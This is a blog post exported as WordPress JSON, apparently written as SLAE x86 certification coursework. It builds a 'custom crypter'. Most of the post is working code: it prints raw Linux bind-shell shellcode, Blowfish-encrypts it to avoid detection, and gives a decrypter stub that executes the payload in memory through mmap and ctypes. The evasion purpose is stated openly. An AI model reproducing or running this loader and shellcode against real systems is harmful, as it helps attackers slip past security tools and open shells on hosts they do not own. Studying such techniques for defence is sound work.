{"id":251,"date":"2020-08-28T11:45:51","date_gmt":"2020-08-28T11:45:51","guid":{"rendered":"https:\/\/badbit.vc\/?p=251"},"modified":"2020-09-02T21:15:03","modified_gmt":"2020-09-02T21:15:03","slug":"custom-crypter","status":"publish","type":"post","link":"https:\/\/badbit.vc\/index.php\/2020\/08\/28\/custom-crypter\/","title":{"rendered":"Custom Crypter"},"content":{"rendered":"\n<p>Crypters are programs which take the payload as input and encrypt it with a strong cryptographic algorithm in order to avoid detection and make analysis a bit difficult. When delivering the encrypted payload to the target host, the payload is run through a decryption stub which decrypts the payload and executes the decrypted shellcode in memory.<\/p>\n\n\n\n<p>In this blog post, we will create our own crypter. We will encrypt our shellcode using <em>Blowfish<\/em> algorithm leveraging Python and decrypt the same via a decrypter stub.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>Schneier, the creator of Blowfish algorith has stated that,<br><em>&#8220;Blowfish is unpatented, and will remain so in all countries. The algorithm is hereby placed in the&nbsp;public domain, and can be freely used by anyone.&#8221;<\/em><\/p><\/blockquote>\n\n\n\n<p>An interesting fact about Blowfish algorithm: It was <strong>open-sourced<\/strong> during a time when cryptographic algorithms were proprietary. Open-sourcing Blowfish helped multiple technologies back then saving them tremendous amount of reasearch time and efforts required to build a crypto algorithm from scratch.<\/p>\n\n\n\n<p>Here are a few keypoints about the Blowfish algorithm:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>32 bits &lt; Key length &lt; 448 bits. Which is anything between 4 and 56 character long<\/li><li>64 bit blocksize = 8 bytes<\/li><\/ul>\n\n\n\n<p>This information will serve as the baseline of our encryption routine.<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>The key should be more than 4 characters and less than 56<\/li><li>The length of shellcode should be divisible by 8<\/li><\/ol>\n\n\n\n<p>We will use &#8220;sh3llc0de&#8221; as the key and &#8220;88888888&#8221; as the IV and Bind shell shellcode as our payload.<\/p>\n\n\n\n<p>Following is the encryption routine:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import blowfish\ndef main():\n\tprint(\"\\n\")\n\tshellcode = b\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb3\\x01\\x51\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x89\\xc6\\xb0\\x66\\x31\\xdb\\x53\\x66\\x68\\x11\\x5c\\x66\\x6a\\x02\\x89\\xe1\\x6a\\x10\\x51\\x56\\x89\\xe1\\xb3\\x02\\xcd\\x80\\xb0\\x66\\x31\\xdb\\x53\\x56\\x89\\xe1\\xb3\\x04\\xcd\\x80\\xb0\\x66\\x31\\xdb\\x53\\x53\\x56\\x89\\xe1\\xb3\\x05\\xcd\\x80\\x89\\xc3\\xb9\\x03\\x00\\x00\\x00\\xb0\\x3f\\x49\\xcd\\x80\\x41\\xe2\\xf8\\x31\\xc9\\x89\\xca\\x51\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\"\n\t\n\tlen_shellcode = len(shellcode)\n\t#length check\n\tif (len_shellcode % 8) != 0:\n\t\tprint(\"&#91;!] Shellcode length = %d, not a multiple of 8. Padding required.\" %len_shellcode)\n\t\t#calculate number of nops required\n\t\tnops = 8 - (len_shellcode % 8)\n\t\tprint(\"&#91;+] Appending %d NOPs to the shellcode\\n\" %nops)\n\t\tshellcode = shellcode+b'\\x90' * nops\n\telse:\n\t\tprint(\"&#91;+] Shellcode length = %d, multiple of 8. Padding not required.\" %len_shellcode)\n\tcrypter = blowfish.Cipher(b\"sh3llc0de\")\n\tiv = b'88888888'\n\tencrypted_shellcode = b\"\".join(crypter.encrypt_cbc(shellcode, iv))\n\t# raw_shellcode = \n\tprint(\"\\n\\n\")\n\tprint(\"&#91;+] Blowfish encryption completed. Printing encrypted shellcode to be fed to decrypter:\\n\")\n\tprint(encrypted_shellcode)\n\t# print(raw_shellcode)\t\n\tcrypted = \"\"\n\tshell_array = bytearray(encrypted_shellcode)\n\tfor x in bytearray(shell_array):\n\t\tcrypted += '\\\\x'\n\t\tcrypted += '%02x' % x\n\tprint(\"&#91;+] Raw encrypted shellcode:\")\n\tprint(crypted)\nif __name__ == '__main__':\n\tmain()<\/code><\/pre>\n\n\n\n<p>Below is the output of our encryption routine:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"183\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Encrypt-1024x183.jpg\" alt=\"\" class=\"wp-image-255\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Encrypt-1024x183.jpg 1024w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Encrypt-300x54.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Encrypt-768x137.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Encrypt-1536x274.jpg 1536w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Encrypt-850x152.jpg 850w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Encrypt.jpg 1900w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Decryption routine:<\/p>\n\n\n\n<p>The decryption routine will do the exact opposite of our encryption routine in order to decrypt our shellcode.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import blowfish\ndef main():\n\t\n\tencrypted_shellcode = b'7@\"\\x19\\xb1\\xaf\\xd8\\xb5\\xe7\\xe3\\x03\\x9b\\xfd\\x9cf\\xf5\\x8chto\\xb43^\\xa6W\\x8c\\x01\\xcfR\\x1e11\\x1d\\xca)\\x97\\x90\\xbdF\\xb8\\xb0l\\x15\\xe6(t,\\x8e\\x99\\x9a\\xee!u\\x19`\\n\\xd1\\xbe\\xea\\xb5\\xcd\\xa1\\xc6\\xa2\\x08\\xdbIi\\xe8\\xf9X\\xf16\\xb9\\xeb\\x15j0-\\xe4\\x81q\\xafW\\xb2\\x9d\\x86\\x81]S\\x9dSg\\xf0\\xce\\xe1\\xfc?\\xd99\\xf6\\xe4\\x86\\x1e\\xdd\\xc5\\xad_d\\x14\\x00n'\n\t\n\tdecrypter = blowfish.Cipher(b'sh3llc0de')\n\tiv = b'88888888'\n\tdecrypted_shellcode = b\"\".join(decrypter.decrypt_cbc(encrypted_shellcode, iv))\n\tprint(\"&#91;+] Decryption completed. Decrypted shellcode:\")\n\tprint(decrypted_shellcode)\n\tprint(\"\\n\")\n\t\n\tshellbytes = bytearray(decrypted_shellcode)\n\tdecrypted = \"\"\n\tfor x in bytearray(shellbytes):\n\t\tdecrypted += '\\\\x'\n\t\tdecrypted += '%02x' % x\n\tprint(\"&#91;+] Decrypted raw shellcode:\")\n\tprint(decrypted)\n<\/code><\/pre>\n\n\n\n<p>Below is the output of our decryption routine:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"97\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Decrypt-1024x97.jpg\" alt=\"\" class=\"wp-image-256\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Decrypt-1024x97.jpg 1024w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Decrypt-300x28.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Decrypt-768x73.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Decrypt-1536x145.jpg 1536w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Decrypt-850x81.jpg 850w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Decrypt.jpg 1890w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Now let&#8217;s try to execute our shellcode via Python itself. While searching about this, I came across two ways to execute shellcode directly in Python. The first method is for Windows hosts and second for Linux. We will play along with the first method in the future posts. <\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"http:\/\/www.debasish.in\/2012\/04\/execute-shellcode-using-python.html\">Calling standard Windows API&#8217;s via <strong><em>ctypes<\/em><\/strong><\/a> &#8211; VirtualAlloc(), CreateThread() etc. (Windows)<\/li><li><a rel=\"noreferrer noopener\" href=\"https:\/\/blog.sektor7.net\/#!res\/2018\/pure-in-memory-linux.md\" target=\"_blank\">Using ctypes and mmap<\/a> &#8211; Create a executable buffer, point it to our decrypted shellcode and call the buffer<\/li><\/ul>\n\n\n\n<p>Below is the final code which decrypts our rncrypted shellcode, prints it on stdout and executes our shellcode.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import blowfish\nimport mmap\nimport ctypes\ndef main():\n\t\n\tencrypted_shellcode = b'7@\"\\x19\\xb1\\xaf\\xd8\\xb5\\xe7\\xe3\\x03\\x9b\\xfd\\x9cf\\xf5\\x8chto\\xb43^\\xa6W\\x8c\\x01\\xcfR\\x1e11\\x1d\\xca)\\x97\\x90\\xbdF\\xb8\\xb0l\\x15\\xe6(t,\\x8e\\x99\\x9a\\xee!u\\x19`\\n\\xd1\\xbe\\xea\\xb5\\xcd\\xa1\\xc6\\xa2\\x08\\xdbIi\\xe8\\xf9X\\xf16\\xb9\\xeb\\x15j0-\\xe4\\x81q\\xafW\\xb2\\x9d\\x86\\x81]S\\x9dSg\\xf0\\xce\\xe1\\xfc?\\xd99\\xf6\\xe4\\x86\\x1e\\xdd\\xc5\\xad_d\\x14\\x00n'\n\t\n\tdecrypter = blowfish.Cipher(b'sh3llc0de')\n\tiv = b'88888888'\n\tdecrypted_shellcode = b\"\".join(decrypter.decrypt_cbc(encrypted_shellcode, iv))\n\tprint(\"&#91;+] Decryption completed. Decrypted shellcode:\")\n\tprint(decrypted_shellcode)\n\tprint(\"\\n\")\n\tshellbytes = bytearray(decrypted_shellcode)\n\tdecrypted = \"\"\n\tfor x in bytearray(shellbytes):\n\t\tdecrypted += '\\\\x'\n\t\tdecrypted += '%02x' % x\n\tprint(\"&#91;+] Decrypted raw shellcode:\")\n\tprint(decrypted)\n\tmap_memory = mmap.mmap(0, len(decrypted_shellcode), flags=mmap.MAP_SHARED | mmap.MAP_ANONYMOUS, prot=mmap.PROT_WRITE | mmap.PROT_READ | mmap.PROT_EXEC)\n\tmap_memory.write(decrypted_shellcode)\n\t\n\tresult = ctypes.c_int64\n\targs = tuple()\n\tbuffered = ctypes.c_int.from_buffer(map_memory)\n\texecute = ctypes.CFUNCTYPE(result, *args)(ctypes.addressof(buffered))\n\texecute()\nif __name__ == '__main__':\n\tmain()<\/code><\/pre>\n\n\n\n<p>And there we have our custom encrypter and decrypter ready. Below is the output:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"532\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Execution-1024x532.jpg\" alt=\"\" class=\"wp-image-273\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Execution-1024x532.jpg 1024w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Execution-300x156.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Execution-768x399.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Execution-1536x798.jpg 1536w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Execution-850x441.jpg 850w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Execution.jpg 1573w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>And this concludes our series!<\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:<br><a href=\"http:\/\/securitytube-training.com\/online-courses\/securitytube-linux-assembly-expert\/\">http:\/\/securitytube-training.com\/online-courses\/securitytube-linux-assembly-expert\/<\/a><\/p>\n\n\n\n<p>Student ID: PA-14690<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/bad-bit\/SLAE_x86\/tree\/master\/Custom%20Encrypter\" target=\"_blank\" rel=\"noreferrer noopener\">Custom Encrypter Github Repo<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Crypters are programs which take the payload as input and encrypt it with a strong cryptographic algorithm in order to avoid detection and make analysis a bit difficult. When delivering the encrypted payload to the target host, the payload is run through a decryption stub which decrypts the payload and executes the decrypted shellcode in&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[7,5,8,6],"class_list":["post-251","post","type-post","status-publish","format-standard","hentry","category-shellcoding","category-slae-x86","tag-linux","tag-shellcode","tag-slae","tag-x86"],"_links":{"self":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/251","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/comments?post=251"}],"version-history":[{"count":11,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/251\/revisions"}],"predecessor-version":[{"id":457,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/251\/revisions\/457"}],"wp:attachment":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/media?parent=251"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/categories?post=251"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/tags?post=251"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}